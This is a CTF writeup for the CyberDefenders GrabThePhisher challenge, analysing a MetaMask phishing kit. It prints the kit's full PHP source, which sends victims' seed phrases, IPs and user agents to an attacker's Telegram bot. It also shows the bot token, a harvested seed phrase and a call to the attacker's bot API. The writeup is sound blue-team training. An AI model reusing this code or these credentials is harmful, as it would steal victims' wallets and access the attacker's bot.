📗 CTF Writeup
GrabThePhisher Blue Team Challenge
A writeup for GrabThePhisher Blue Team Challenge by CyberDefenders, enjoy! :D
1. Which wallet is used for asking the seed phrase?
2. What is the file name that has the code for the phishing kit?
3. In which language was the kit written?
4. What service does the kit use to retrieve the victim's machine information?
5. How many seed phrases were already collected?
6. Write down the seed phrase of the most recent phishing incident?
7. Which medium had been used for credential dumping?
8. What is the token for the channel?
9. What is the chat ID of the phisher's channel?
10. What are the allies of the phish kit developer?
11. What is the full name of the Phish Actor?
12. What is the username of the Phish Actor?
1. Which wallet is used for asking the seed phrase?
Metamask
2. What is the file name that has the code for the phishing kit?
Since Metamask has a separate pop-out compared to the rest of the wallets, I decided to look at the code for Metamask.
There was a file called `metamask.php` inside the `metamask` folder, and this was its content:

```php
<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y");
//aaja
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/
$message = "<b>Welcome 2 The Jungle </b> <b>Wallet:</b> Metamask <b>Phrase:</b> <code>" . $_POST["data"] . "</code> <b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. " <b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";
sendTel($message);

function sendTel($message) {
    $id = "5442785564";
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
    $filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
    file_get_contents($filename);
    $_POST["import-account__secret-phrase"].
    $text = $_POST['data']."\n";;
    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>
```
This PHP script interacts with the SypexGeo API and the Telegram Bot API. Let's break down what each part of the code does:
- SypexGeo API interaction:
  - The script uses the `file_get_contents` function to make a GET request to the SypexGeo API. It fetches JSON data from the API using the URL "http://api.sypexgeo.net/json/" concatenated with the victim's IP address, `$_SERVER['REMOTE_ADDR']`.
  - The JSON response is then decoded with `json_decode` into an object stored in `$array`.
  - The country name and city name in English are extracted from the decoded object using `$array->country->name_en` and `$array->city->name_en` respectively.
- Comments:
  - The code includes some comments that seem to have been left by the author (j1j1b1s@m3r0).
- Telegram API interaction:
  - The script constructs a message containing various details:
    - Wallet information (Metamask)
    - The phrase the victim submitted in the POST request
    - The victim's IP address, country, and city
    - User agent (browser/device) information from the `$_SERVER['HTTP_USER_AGENT']` variable
  - The `sendTel` function is invoked, passing the constructed message.
- Telegram message sending:
  - The `sendTel` function takes the constructed message and sends it to a Telegram chat using the Telegram Bot API.
  - The Telegram Bot API token and chat ID are used to construct the API endpoint URL.
  - The message is URL-encoded and passed as a parameter to the Telegram API URL, which is then requested with `file_get_contents`.
- Log file operation:
  - The script attempts to append the submitted phrase to a log file named `log.txt` in a directory on the server.
  - The directory path is determined using `$_SERVER['DOCUMENT_ROOT']`.
metamask.php
3. In which language was the kit written?
Covered in Q2: the file extension gives it away.
php
4. What service does the kit use to retrieve the victim's machine information?
Covered in Q2: the script uses the `file_get_contents` function to make a GET request to the SypexGeo API. It fetches JSON data from the API using the URL "http://api.sypexgeo.net/json/" concatenated with the victim's IP address, `$_SERVER['REMOTE_ADDR']`.
Sypex Geo
5. How many seed phrases were already collected?
In Q2, it was mentioned that the script attempts to append the submitted phrase to a log file named `log.txt` in a directory on the server. So `log.txt` is located in the `log` folder, and this was its contents:
3
6. Write down the seed phrase of the most recent phishing incident?
In Q2, it was mentioned that the script attempts to append the submitted phrase to a log file named `log.txt` in a directory on the server, so the answer will be the last line in `log.txt`.
father also recycle embody balance concert mechanic believe owner pair muffin hockey
7. Which medium had been used for credential dumping?
Covered in Q2: the `sendTel` function takes the constructed message and sends it to a Telegram chat using the Telegram Bot API.
Telegram
8. What is the token for the channel?
Covered in Q2: the token for the Telegram channel was assigned to the `$token` variable.
5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9. What is the chat ID of the phisher's channel?
Covered in Q2: the chat ID for the Telegram channel was assigned to the `$id` variable.
5442785564
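To automate the triage done by hand in Q2, Q5/Q6 and Q8/Q9, here is an added Python example (not part of the original writeup or of the kit) that pulls the exfiltration indicators out of the kit's PHP source and summarises a `log.txt`. The PHP excerpt and the last log line are the values shown on this page; the two filler log lines are constructed.

```python
import re

# Excerpt of the kit's metamask.php as quoted in the writeup (the bot token and
# chat ID are the values shown on the page, not constructed).
PHP_SRC = r'''
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$message = "<b>Welcome 2 The Jungle </b> <b>Wallet:</b> Metamask <b>Phrase:</b> <code>" . $_POST["data"] . "</code>";
function sendTel($message) {
    $id = "5442785564";
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
    $filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message);
    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
'''

# Telegram bot tokens look like "<numeric bot id>:<35-char secret>".
TOKEN_RE = re.compile(r'\$token\s*=\s*"(\d{8,12}:[A-Za-z0-9_-]{30,})"')
CHAT_ID_RE = re.compile(r'\$id\s*=\s*"(-?\d+)"')
HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')
WALLET_RE = re.compile(r'<b>Wallet:</b>\s*([A-Za-z0-9]+)')
LOG_RE = re.compile(r"'/([A-Za-z0-9_/]+)/'\.'([A-Za-z0-9_.]+)'")

def extract_iocs(src):
    """Pull the exfiltration indicators out of the kit's PHP source."""
    def first(rx):
        m = rx.search(src)
        return m.group(1) if m else None
    log = LOG_RE.search(src)
    return {
        "wallet": first(WALLET_RE),
        "bot_token": first(TOKEN_RE),
        "chat_id": first(CHAT_ID_RE),
        "contacted_hosts": sorted(set(HOST_RE.findall(src))),
        "log_path": f"/{log.group(1)}/{log.group(2)}" if log else None,
    }

def analyze_log(text):
    """Count captured phrases (one per line) and return the most recent one."""
    phrases = [ln.strip() for ln in text.splitlines() if ln.strip()]
    # BIP-39 mnemonics have 12, 15, 18, 21 or 24 words; anything else is junk input.
    bip39_like = [p for p in phrases if len(p.split()) in (12, 15, 18, 21, 24)]
    return {"count": len(phrases), "latest": phrases[-1] if phrases else None,
            "bip39_like": len(bip39_like)}

# Constructed stand-in for log.txt: two filler lines plus the page's final phrase.
FILLER = " ".join(f"word{i}" for i in range(1, 13))
LOG_SAMPLE = "\n".join([FILLER, FILLER,
    "father also recycle embody balance concert mechanic believe owner pair muffin hockey"]) + "\n"
```

Running `extract_iocs(PHP_SRC)` and `analyze_log(LOG_SAMPLE)` reproduces the answers to Q2, Q4, Q5, Q6, Q8 and Q9 from the source alone, which is the kind of check worth scripting when more than one kit has to be triaged.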
10. What are the allies of the phish kit developer?
Covered in Q2, this was mentioned in the comments.
j1j1b1s@m3r0
11. What is the full name of the Phish Actor?
Since the link to make an API call to the Telegram Bot API was already in `metamask.php`, I tried calling the API by navigating to this (I put a `hello` as a placeholder for the API call):
So just combine the `first_name` and `last_name`, and you'll get:
Marcus Aurelius
12. What is the username of the Phish Actor?
Mentioned in Q11: the `username` variable in the API call output.
pumpkinboii